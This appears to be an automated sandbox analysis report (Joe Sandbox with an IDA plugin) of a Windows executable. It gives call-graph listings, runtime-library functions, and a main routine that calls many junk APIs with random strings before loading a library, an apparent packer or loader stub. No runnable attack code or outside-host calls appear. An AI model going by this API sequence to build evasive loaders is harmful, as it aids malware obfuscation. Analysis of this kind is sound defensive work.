___convertcp 67 API calls 4881->4882 4883 406a26 4882->4883 4884 403235 ___convertcp 67 API calls 4883->4884 4885 406a2e 4884->4885 4886 403235 ___convertcp 67 API calls 4885->4886 4887 406a35 4886->4887 4888 403235 ___convertcp 67 API calls 4887->4888 4889 406a3d 4888->4889 4890 403235 ___convertcp 67 API calls 4889->4890 4891 406a45 4890->4891 4892 403235 ___convertcp 67 API calls 4891->4892 4893 406a4d 4892->4893 4894 403235 ___convertcp 67 API calls 4893->4894 4895 406a55 4894->4895 4896 403235 ___convertcp 67 API calls 4895->4896 4897 406a5d 4896->4897 4898 403235 ___convertcp 67 API calls 4897->4898 4899 406a65 4898->4899 4900 403235 ___convertcp 67 API calls 4899->4900 4901 406a6d 4900->4901 4902 403235 ___convertcp 67 API calls 4901->4902 4903 406a75 4902->4903 4904 403235 ___convertcp 67 API calls 4903->4904 4905 406a7d 4904->4905 4906 403235 ___convertcp 67 API calls 4905->4906 4907 406a88 4906->4907 4908 403235 ___convertcp 67 API calls 4907->4908 4909 406a90 4908->4909 4910 403235 ___convertcp 67 API calls 4909->4910 4911 406a98 4910->4911 4912 403235 ___convertcp 67 API calls 4911->4912 4913 406aa0 4912->4913 4914 403235 ___convertcp 67 API calls 4913->4914 4915 406aa8 4914->4915 4916 403235 ___convertcp 67 API calls 4915->4916 4917 406ab0 4916->4917 4918 403235 ___convertcp 67 API calls 4917->4918 4919 406ab8 4918->4919 4920 403235 ___convertcp 67 API calls 4919->4920 4921 406ac0 4920->4921 4922 403235 ___convertcp 67 API calls 4921->4922 4923 406ac8 4922->4923 4924 403235 ___convertcp 67 API calls 4923->4924 4925 406ad0 4924->4925 4926 403235 ___convertcp 67 API calls 4925->4926 4927 406ad8 4926->4927 4928 403235 ___convertcp 67 API calls 4927->4928 4929 406ae0 4928->4929 4930 403235 ___convertcp 67 API calls 4929->4930 4931 406ae8 4930->4931 4932 403235 ___convertcp 67 API calls 4931->4932 4933 406af0 4932->4933 4934 403235 ___convertcp 67 API calls 4933->4934 4935 406af8 4934->4935 4936 403235 ___convertcp 67 API calls 4935->4936 4937 406b00 4936->4937 4938 403235 ___convertcp 67 API calls 4937->4938 4939 406b0e 4938->4939 4940 403235 ___convertcp 67 API calls 4939->4940 4941 406b19 4940->4941 4942 403235 ___convertcp 67 API calls 4941->4942 4943 406b24 4942->4943 4944 403235 ___convertcp 67 API calls 4943->4944 4945 406b2f 4944->4945 4946 403235 ___convertcp 67 API calls 4945->4946 4947 406b3a 4946->4947 4948 403235 ___convertcp 67 API calls 4947->4948 4949 406b45 4948->4949 4950 403235 ___convertcp 67 API calls 4949->4950 4951 406b50 4950->4951 4952 403235 ___convertcp 67 API calls 4951->4952 4953 406b5b 4952->4953 4954 403235 ___convertcp 67 API calls 4953->4954 4955 406b66 4954->4955 4956 403235 ___convertcp 67 API calls 4955->4956 4957 406b71 4956->4957 4958 403235 ___convertcp 67 API calls 4957->4958 4958->4873 4959->4802 4963 401bdd LeaveCriticalSection 4960->4963 4962 405486 4962->4781 4963->4962 4965 402be7 _LocaleUpdate::_LocaleUpdate 77 API calls 4964->4965 4966 405c0f 4965->4966 4967 4069ab 4966->4967 4968 402be7 _LocaleUpdate::_LocaleUpdate 77 API calls 4967->4968 4969 4069be 4968->4969 4972 4067f1 4969->4972 4973 406812 GetStringTypeW 4972->4973 4975 40683d 4972->4975 4974 406832 GetLastError 4973->4974 4977 40682a 4973->4977 4974->4975 4975->4977 4978 406924 4975->4978 4976 406876 MultiByteToWideChar 4984 4068a3 4976->4984 4995 40691e 4976->4995 4977->4976 4977->4995 5000 406dfc GetLocaleInfoA 4978->5000 4981 401000 setSBUpLow 5 API calls 4982 4069a9 4981->4982 4982->4755 4983 406975 GetStringTypeA 4987 406990 4983->4987 4983->4995 4988 4068b8 _memset __alloca_probe_16 4984->4988 4989 40109e _malloc 67 API calls 4984->4989 4986 4068f1 MultiByteToWideChar 4991 406907 GetStringTypeW 4986->4991 4992 406918 4986->4992 4993 403235 ___convertcp 67 API calls 4987->4993 4988->4986 4988->4995 4989->4988 4991->4992 4996 406141 4992->4996 4993->4995 4995->4981 4997 40614d 4996->4997 4999 40615e 4996->4999 4998 403235 ___convertcp 67 API calls 4997->4998 4997->4999 4998->4999 4999->4995 5001 406e2a 5000->5001 5002 406e2f 5000->5002 5004 401000 setSBUpLow 5 API calls 5001->5004 5003 401168 ___ansicp 90 API calls 5002->5003 5003->5001 5005 406948 5004->5005 5005->4983 5005->4995 5006 406e45 5005->5006 5007 406f0f 5006->5007 5008 406e85 GetCPInfo 5006->5008 5011 401000 setSBUpLow 5 API calls 5007->5011 5009 406efa MultiByteToWideChar 5008->5009 5010 406e9c 5008->5010 5009->5007 5015 406eb5 _strlen 5009->5015 5010->5009 5012 406ea2 GetCPInfo 5010->5012 5013 406969 5011->5013 5012->5009 5014 406eaf 5012->5014 5013->4983 5013->4995 5014->5009 5014->5015 5016 40109e _malloc 67 API calls 5015->5016 5019 406ee7 _memset __alloca_probe_16 5015->5019 5016->5019 5017 406f44 MultiByteToWideChar 5018 406f5c 5017->5018 5028 406f7b 5017->5028 5020 406f80 5018->5020 5021 406f63 WideCharToMultiByte 5018->5021 5019->5007 5019->5017 5023 406f8b WideCharToMultiByte 5020->5023 5024 406f9f 5020->5024 5021->5028 5022 406141 ___convertcp 67 API calls 5022->5007 5023->5024 5023->5028 5025 40488f __calloc_crt 67 API calls 5024->5025 5026 406fa7 5025->5026 5027 406fb0 WideCharToMultiByte 5026->5027 5026->5028 5027->5028 5029 406fc2 5027->5029 5028->5022 5030 403235 ___convertcp 67 API calls 5029->5030 5030->5028 5032 407230 __locking 5031->5032 5033 401cb7 __lock 67 API calls 5032->5033 5038 40723f 5033->5038 5034 4072d7 5049 4072f5 5034->5049 5037 4072e3 __locking 5037->4708 5038->5034 5040 4071dc 105 API calls __fflush_nolock 5038->5040 5041 407d3b 5038->5041 5046 4072c6 5038->5046 5040->5038 5042 407d48 5041->5042 5043 407d5e EnterCriticalSection 5041->5043 5044 401cb7 __lock 67 API calls 5042->5044 5043->5038 5045 407d51 5044->5045 5045->5038 5052 407da9 5046->5052 5048 4072d4 5048->5038 5058 401bdd LeaveCriticalSection 5049->5058 5051 4072fc 5051->5037 5053 407db9 5052->5053 5054 407dcc LeaveCriticalSection 5052->5054 5057 401bdd LeaveCriticalSection 5053->5057 5054->5048 5056 407dc9 5056->5048 5057->5056 5058->5051 5060 416681 FatalAppExitA GetModuleHandleW 5059->5060 5061 416693 5059->5061 5060->5061 5061->4717 5061->4718 5063 4166c3 BuildCommDCBA 5062->5063 5066 4166cf 5062->5066 5063->5066 5064 4166fb 5064->4721 5064->4722 5066->5064 5067 4166a0 5066->5067 5070 416620 5067->5070 5071 41664b 5070->5071 5072 41663c SetPriorityClass 5070->5072 5071->5066 5072->5071 5074 401524 __locking 5073->5074 5075 401cb7 __lock 67 API calls 5074->5075 5076 40152b 5075->5076 5079 40333e __decode_pointer 6 API calls 5076->5079 5083 4015e4 __initterm 5076->5083 5081 401562 5079->5081 5080 40162c __locking 5080->4147 5081->5083 5085 40333e __decode_pointer 6 API calls 5081->5085 5090 40162f 5083->5090 5084 401623 5086 401428 _fast_error_exit 3 API calls 5084->5086 5088 401577 5085->5088 5086->5080 5087 403335 6 API calls __init_pointers 5087->5088 5088->5083 5088->5087 5089 40333e 6 API calls __decode_pointer 5088->5089 5089->5088 5091 401635 5090->5091 5092 401610 5090->5092 5095 401bdd LeaveCriticalSection 5091->5095 5092->5080 5094 401bdd LeaveCriticalSection 5092->5094 5094->5084 5095->5092 5114 4166d7 5116 4166e0 5114->5116 5115 4166a0 SetPriorityClass 5115->5116 5116->5115 5117 4166fb 5116->5117 5462 403a77 5463 40488f __calloc_crt 67 API calls 5462->5463 5464 403a83 5463->5464 5465 4032c3 __encode_pointer 6 API calls 5464->5465 5466 403a8b 5465->5466 5651 408339 5652 408352 5651->5652 5653 40834a 5651->5653 5655 408364 5652->5655 5656 408361 CloseHandle 5652->5656 5653->5652 5654 40834f CloseHandle 5653->5654 5654->5652 5656->5655 5118 407cda 5119 4072fe ___endstdio 105 API calls 5118->5119 5120 407cdf 5119->5120 5121 407ced 5120->5121 5125 40827b 5120->5125 5122 403235 ___convertcp 67 API calls 5121->5122 5124 407cf8 5122->5124 5126 408287 __locking 5125->5126 5127 401cb7 __lock 67 API calls 5126->5127 5130 408293 5127->5130 5128 4082fc 5148 408311 5128->5148 5130->5128 5133 4082d1 DeleteCriticalSection 5130->5133 5135 4083dd 5130->5135 5131 408308 __locking 5131->5121 5134 403235 ___convertcp 67 API calls 5133->5134 5134->5130 5136 4083e9 __locking 5135->5136 5137 40841a 5136->5137 5138 4083fd 5136->5138 5144 408412 __locking 5137->5144 5151 407cfa 5137->5151 5139 4019d4 __set_error_mode 67 API calls 5138->5139 5141 408402 5139->5141 5143 403997 __set_error_mode 6 API calls 5141->5143 5143->5144 5144->5130 5395 401bdd LeaveCriticalSection 5148->5395 5150 408318 5150->5131 5152 407d0c 5151->5152 5153 407d2e EnterCriticalSection 5151->5153 5152->5153 5154 407d14 5152->5154 5155 407d24 5153->5155 5156 401cb7 __lock 67 API calls 5154->5156 5157 408366 5155->5157 5156->5155 5158 408396 5157->5158 5159 40837a 5157->5159 5171 40838f 5158->5171 5176 407174 5158->5176 5160 4019d4 __set_error_mode 67 API calls 5159->5160 5162 40837f 5160->5162 5163 403997 __set_error_mode 6 API calls 5162->5163 5163->5171 5170 4083b6 5170->5171 5172 403235 ___convertcp 67 API calls 5170->5172 5173 408451 5171->5173 5172->5171 5388 407d6d 5173->5388 5175 408457 5175->5144 5177 40718d 5176->5177 5178 4071af 5176->5178 5177->5178 5179 407b16 __fileno 67 API calls 5177->5179 5182 4085c2 5178->5182 5180 4071a8 5179->5180 5215 407a3a 5180->5215 5183 4083aa 5182->5183 5184 4085d2 5182->5184 5186 407b16 5183->5186 5184->5183 5185 403235 ___convertcp 67 API calls 5184->5185 5185->5183 5187 407b3a 5186->5187 5188 407b25 5186->5188 5192 4084f5 5187->5192 5189 4019d4 __set_error_mode 67 API calls 5188->5189 5190 407b2a 5189->5190 5191 403997 __set_error_mode 6 API calls 5190->5191 5191->5187 5193 408501 __locking 5192->5193 5194 408524 5193->5194 5195 408509 5193->5195 5196 408532 5194->5196 5201 408573 5194->5201 5197 4019e7 __locking 67 API calls 5195->5197 5198 4019e7 __locking 67 API calls 5196->5198 5199 40850e 5197->5199 5200 408537 5198->5200 5202 4019d4 __set_error_mode 67 API calls 5199->5202 5203 4019d4 __set_error_mode 67 API calls 5200->5203 5204 4081b4 ___lock_fhandle 68 API calls 5201->5204 5211 408516 __locking 5202->5211 5205 40853e 5203->5205 5206 408579 5204->5206 5207 403997 __set_error_mode 6 API calls 5205->5207 5208 408594 5206->5208 5209 408586 5206->5209 5207->5211 5210 4019d4 __set_error_mode 67 API calls 5208->5210 5360 408459 5209->5360 5213 40858e 5210->5213 5211->5170 5375 4085b8 5213->5375 5216 407a46 __locking 5215->5216 5217 407a69 5216->5217 5218 407a4e 5216->5218 5220 407a77 5217->5220 5223 407ab8 5217->5223 5240 4019e7 5218->5240 5222 4019e7 __locking 67 API calls 5220->5222 5225 407a7c 5222->5225 5243 4081b4 5223->5243 5224 4019d4 __set_error_mode 67 API calls 5227 407a5b __locking 5224->5227 5228 4019d4 __set_error_mode 67 API calls 5225->5228 5227->5178 5230 407a83 5228->5230 5229 407abe 5232 407ae1 5229->5232 5233 407acb 5229->5233 5231 403997 __set_error_mode 6 API calls 5230->5231 5231->5227 5235 4019d4 __set_error_mode 67 API calls 5232->5235 5253 407307 5233->5253 5236 407ae6 5235->5236 5237 4019e7 __locking 67 API calls 5236->5237 5238 407ad9 5237->5238 5312 407b0c 5238->5312 5241 403511 __getptd_noexit 67 API calls 5240->5241 5242 4019ec 5241->5242 5242->5224 5244 4081c0 __locking 5243->5244 5245 40821b 5244->5245 5246 401cb7 __lock 67 API calls 5244->5246 5247 408220 EnterCriticalSection 5245->5247 5248 40823d __locking 5245->5248 5249 4081ec 5246->5249 5247->5248 5248->5229 5250 408203 5249->5250 5251 4040a7 __mtinitlocknum InitializeCriticalSectionAndSpinCount 5249->5251 5315 40824b 5250->5315 5251->5250 5254 407316 __write_nolock 5253->5254 5255 407348 5254->5255 5256 40736f 5254->5256 5286 40733d 5254->5286 5257 4019e7 __locking 67 API calls 5255->5257 5261 4073d7 5256->5261 5262 4073b1 5256->5262 5260 40734d 5257->5260 5258 401000 setSBUpLow 5 API calls 5259 407a38 5258->5259 5259->5238 5264 4019d4 __set_error_mode 67 API calls 5260->5264 5263 4073eb 5261->5263 5319 408032 5261->5319 5265 4019e7 __locking 67 API calls 5262->5265 5329 407fce 5263->5329 5268 407354 5264->5268 5266 4073b6 5265->5266 5270 4019d4 __set_error_mode 67 API calls 5266->5270 5271 403997 __set_error_mode 6 API calls 5268->5271 5273 4073bf 5270->5273 5271->5286 5272 4073f6 5274 40769c 5272->5274 5278 40358a __getptd 67 API calls 5272->5278 5275 403997 __set_error_mode 6 API calls 5273->5275 5276 40796b WriteFile 5274->5276 5277 4076ac 5274->5277 5275->5286 5279 40767e 5276->5279 5280 40799e GetLastError 5276->5280 5281 40778a 5277->5281 5299 4076c0 5277->5299 5282 407411 GetConsoleMode 5278->5282 5284 4079e9 5279->5284 5279->5286 5288 4079bc 5279->5288 5280->5279 5301 40786a 5281->5301 5304 407799 5281->5304 5282->5274 5283 40743c 5282->5283 5283->5274 5285 40744e GetConsoleCP 5283->5285 5284->5286 5287 4019d4 __set_error_mode 67 API calls 5284->5287 5285->5279 5306 407471 5285->5306 5286->5258 5290 407a0c 5287->5290 5292 4079c7 5288->5292 5293 4079db 5288->5293 5289 40772e WriteFile 5289->5280 5289->5299 5295 4019e7 __locking 67 API calls 5290->5295 5291 4078d0 WideCharToMultiByte 5291->5280 5297 407907 WriteFile 5291->5297 5296 4019d4 __set_error_mode 67 API calls 5292->5296 5341 4019fa 5293->5341 5295->5286 5300 4079cc 5296->5300 5297->5301 5302 40793e GetLastError 5297->5302 5298 40780e WriteFile 5298->5280 5298->5304 5299->5279 5299->5284 5299->5289 5303 4019e7 __locking 67 API calls 5300->5303 5301->5279 5301->5284 5301->5291 5301->5297 5302->5301 5303->5286 5304->5279 5304->5284 5304->5298 5306->5279 5306->5280 5307 40751d WideCharToMultiByte 5306->5307 5309 407fb4 79 API calls __fassign 5306->5309 5310 407dd8 11 API calls __putwch_nolock 5306->5310 5311 4075a2 WriteFile 5306->5311 5338 406db8 5306->5338 5307->5279 5308 40754e WriteFile 5307->5308 5308->5280 5308->5306 5309->5306 5310->5306 5311->5280 5311->5306 5359 408254 LeaveCriticalSection 5312->5359 5314 407b14 5314->5227 5318 401bdd LeaveCriticalSection 5315->5318 5317 408252 5317->5245 5318->5317 5346 40813d 5319->5346 5321 408050 5322 408058 5321->5322 5323 408069 SetFilePointer 5321->5323 5324 4019d4 __set_error_mode 67 API calls 5322->5324 5325 408081 GetLastError 5323->5325 5327 40805d 5323->5327 5324->5327 5326 40808b 5325->5326 5325->5327 5328 4019fa __dosmaperr 67 API calls 5326->5328 5327->5263 5328->5327 5330 407fea 5329->5330 5331 407fdb 5329->5331 5333 4019d4 __set_error_mode 67 API calls 5330->5333 5336 40800e 5330->5336 5332 4019d4 __set_error_mode 67 API calls 5331->5332 5334 407fe0 5332->5334 5335 407ffe 5333->5335 5334->5272 5337 403997 __set_error_mode 6 API calls 5335->5337 5336->5272 5337->5336 5339 406d80 __isleadbyte_l 77 API calls 5338->5339 5340 406dc7 5339->5340 5340->5306 5342 4019e7 __locking 67 API calls 5341->5342 5343 401a05 __dosmaperr 5342->5343 5344 4019d4 __set_error_mode 67 API calls 5343->5344 5345 401a18 5344->5345 5345->5286 5347 408162 5346->5347 5348 40814a 5346->5348 5350 4019e7 __locking 67 API calls 5347->5350 5356 4081a7 5347->5356 5349 4019e7 __locking 67 API calls 5348->5349 5351 40814f 5349->5351 5352 408190 5350->5352 5353 4019d4 __set_error_mode 67 API calls 5351->5353 5355 4019d4 __set_error_mode 67 API calls 5352->5355 5354 408157 5353->5354 5354->5321 5357 408197 5355->5357 5356->5321 5358 403997 __set_error_mode 6 API calls 5357->5358 5358->5356 5359->5314 5361 40813d __close_nolock 67 API calls 5360->5361 5362 408469 5361->5362 5363 4084bf 5362->5363 5365 40849d 5362->5365 5366 40813d __close_nolock 67 API calls 5362->5366 5378 4080b7 5363->5378 5365->5363 5367 40813d __close_nolock 67 API calls 5365->5367 5369 408494 5366->5369 5370 4084a9 CloseHandle 5367->5370 5372 40813d __close_nolock 67 API calls 5369->5372 5370->5363 5373 4084b5 GetLastError 5370->5373 5371 4084e9 5371->5213 5372->5365 5373->5363 5374 4019fa __dosmaperr 67 API calls 5374->5371 5387 408254 LeaveCriticalSection 5375->5387 5377 4085c0 5377->5211 5379 408123 5378->5379 5380 4080c8 5378->5380 5381 4019d4 __set_error_mode 67 API calls 5379->5381 5380->5379 5386 4080f3 5380->5386 5382 408128 5381->5382 5383 4019e7 __locking 67 API calls 5382->5383 5384 408119 5383->5384 5384->5371 5384->5374 5385 408113 SetStdHandle 5385->5384 5386->5384 5386->5385 5387->5377 5389 407d9d LeaveCriticalSection 5388->5389 5390 407d7e 5388->5390 5389->5175 5390->5389 5391 407d85 5390->5391 5394 401bdd LeaveCriticalSection 5391->5394 5393 407d9a 5393->5175 5394->5393 5395->5150 5396 4040df 5397 4040eb SetLastError 5396->5397 5398 4040f3 __locking 5396->5398 5397->5398

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2477803136-0
                                                                                                                                              • Opcode ID: 287b2ba1be834a2d5081bfe1d4c2595d0c18faf5a576ef3c029249bf642c26b8
                                                                                                                                              • Instruction ID: 1ddf2cd531eec152a9fcae4ce62b7a222f7f1f098f12d72469ebe43987e19914
                                                                                                                                              • Opcode Fuzzy Hash: 287b2ba1be834a2d5081bfe1d4c2595d0c18faf5a576ef3c029249bf642c26b8
                                                                                                                                              • Instruction Fuzzy Hash: AE2192B09003059AEB147BB3A886BAE3264AF0074CF14443FF545BB5F2EB7C8980975D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 62 40299c-4029be HeapCreate 63 4029c0-4029c1 62->63 64 4029c2-4029cb 62->64
                                                                                                                                              APIs
                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004029B1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                              • Opcode ID: 82a3ce63483adf37cabcd1f939d0096d7177a00d7d7292b2bc497fdd817d45e1
                                                                                                                                              • Instruction ID: 0f9cce50ebc2d21aa67104eb30b8857fff835c89720ca9b263f404ff36a43163
                                                                                                                                              • Opcode Fuzzy Hash: 82a3ce63483adf37cabcd1f939d0096d7177a00d7d7292b2bc497fdd817d45e1
                                                                                                                                              • Instruction Fuzzy Hash: 96D05E72A543099ADB005F756C097A63BECE388395F10C43ABD0CC65D0F674D550DA44

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 65 4167c0-4167e8 call 407000 68 4167f0-4167f7 65->68 69 416824-41682a 68->69 70 4167f9-416822 GetVolumeInformationA 68->70 71 41682c-416838 69->71 72 41683e-416848 69->72 70->69 71->72 73 416883-41688a 72->73 74 41684a-416879 WriteConsoleOutputAttribute 72->74 73->68 75 416890-416896 73->75 74->73 76 416898-41689e 75->76 77 4168a0-4168a6 76->77 78 4168ac-4168b3 76->78 77->78 79 4168b5-4168b7 DeleteVolumeMountPointW 78->79 80 4168b9-4168c0 78->80 79->80 80->76 81 4168c2-4168c9 80->81 82 4169df-4169ed 81->82 83 4168cf-4169b2 InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode call 4047d0 GetDefaultCommConfigA CopyFileA CreatePipe GetEnvironmentStringsW ReadConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 81->83 85 4169f0-4169fe SetCommState GetLastError 82->85 89 4169c0-4169c7 83->89 90 4169b4-4169ba ObjectPrivilegeAuditAlarmA 83->90 87 416a00-416a07 85->87 88 416a09-416a10 85->88 87->85 87->88 91 416ac2-416ad1 call 4164a0 88->91 92 416a16-416abd GetConsoleAliasesLengthW GetComputerNameW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryTypeA FormatMessageA GetLongPathNameW GetCommTimeouts call 40100f call 401189 call 40109e call 40100f call 4072fe call 40100f call 40109e call 401644 88->92 93 4169d0-4169dc call 401168 call 40117e 89->93 94 4169c9-4169ca ReleaseMutex 89->94 90->89 100 416ad3-416ae4 91->100 101 416b0d-416b2e LoadLibraryW call 4164d0 call 416720 91->101 92->91 93->82 94->93 105 416af0-416b00 100->105 117 416b30-416b37 101->117 111 416b02 105->111 112 416b08-416b0b 105->112 111->112 112->101 112->105 119 416b39-416b47 LocalAlloc GetStdHandle MoveFileA 117->119 120 416b4d-416b53 117->120 119->120 122 416b55 call 4164c0 120->122 123 416b5a-416b61 120->123 122->123 127 416b70-416b77 123->127 128 416b63-416b6a InterlockedDecrement 123->128 127->117 130 416b79-416b89 127->130 128->127 132 416b90-416ba0 130->132 134 416ba2-416ba7 GetFileAttributesW 132->134 135 416ba9-416bac 132->135 134->135 135->132 136 416bae-416bb9 135->136 138 416bc0-416bc5 136->138 139 416bc7-416bcd 138->139 140 416bcf-416bd5 138->140 139->140 141 416bd7-416be4 call 401000 139->141 140->138 140->141
                                                                                                                                              APIs
                                                                                                                                              • GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00416822
                                                                                                                                              • WriteConsoleOutputAttribute.KERNEL32(00000000,00000000,00000000,?,?), ref: 0041686D
                                                                                                                                              • DeleteVolumeMountPointW.KERNEL32(00000000), ref: 004168B7
                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004168DA
                                                                                                                                              • GetFocus.USER32 ref: 004168E0
                                                                                                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004168ED
                                                                                                                                              • FindAtomW.KERNEL32(00000000), ref: 004168F4
                                                                                                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 004168FC
                                                                                                                                              • _memset.LIBCMT ref: 00416912
                                                                                                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00416923
                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0041692C
                                                                                                                                              • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00416942
                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00416948
                                                                                                                                              • ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041698D
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041699C
                                                                                                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 004169A5
                                                                                                                                              • ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004169BA
                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 004169CA
                                                                                                                                              • SetCommState.KERNEL32(00000000,00000000), ref: 004169F4
                                                                                                                                              • GetLastError.KERNEL32 ref: 004169F6
                                                                                                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00416A25
                                                                                                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00416A39
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00416A40
                                                                                                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00416A46
                                                                                                                                              • GetBinaryTypeA.KERNEL32(sutelizunosisibure,?), ref: 00416A58
                                                                                                                                              • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00416A6B
                                                                                                                                              • GetLongPathNameW.KERNEL32(tekeragej,?,00000000), ref: 00416A7E
                                                                                                                                              • GetCommTimeouts.KERNEL32(00000000,00000000), ref: 00416A86
                                                                                                                                              • _calloc.LIBCMT ref: 00416A8E
                                                                                                                                              • _realloc.LIBCMT ref: 00416A95
                                                                                                                                              • _malloc.LIBCMT ref: 00416A9B
                                                                                                                                              • _calloc.LIBCMT ref: 00416AA2
                                                                                                                                              • _calloc.LIBCMT ref: 00416AAE
                                                                                                                                              • _malloc.LIBCMT ref: 00416AB4
                                                                                                                                              • LoadLibraryW.KERNEL32(gavosebisiv), ref: 00416B12
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Console$CommFileName_calloc$LengthOutputReadVolume_malloc$AdjustmentAlarmAliasAliasesAtomAttributeAttributesAuditBinaryCompareComputerConfigCopyCreateDefaultDeleteEnvironmentErrorExchangeExesFindFocusFormatInformationInterlockedLastLibraryLoadLongMessageModeModuleMountMutexObjectPathPipePointPrivilegeReleaseStateStringsSystemTimeTimeoutsTypeWrite_memset_realloc
                                                                                                                                              • String ID: gavosebisiv$k`$sutelizunosisibure$tekeragej$wumefalijocenor$}$
                                                                                                                                              • API String ID: 2926064888-770840792
                                                                                                                                              • Opcode ID: b83e9ab29cf5346ce2fc535f0d494ce7507c83c62c4cb789c664dfa5c778e51b
                                                                                                                                              • Instruction ID: 66b7ba66da8bb5d3bd80010fb135f4a1ed8397abbfee7ed1f5eca20cf58200d5
                                                                                                                                              • Opcode Fuzzy Hash: b83e9ab29cf5346ce2fc535f0d494ce7507c83c62c4cb789c664dfa5c778e51b
                                                                                                                                              • Instruction Fuzzy Hash: 6DA1D571846624ABC720EB61DC45BDF7B78EF4D314F0180AAF609A3161DB385A85CBED

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00401947
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040195C
                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(00417210), ref: 00401967
                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00401983
                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 0040198A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
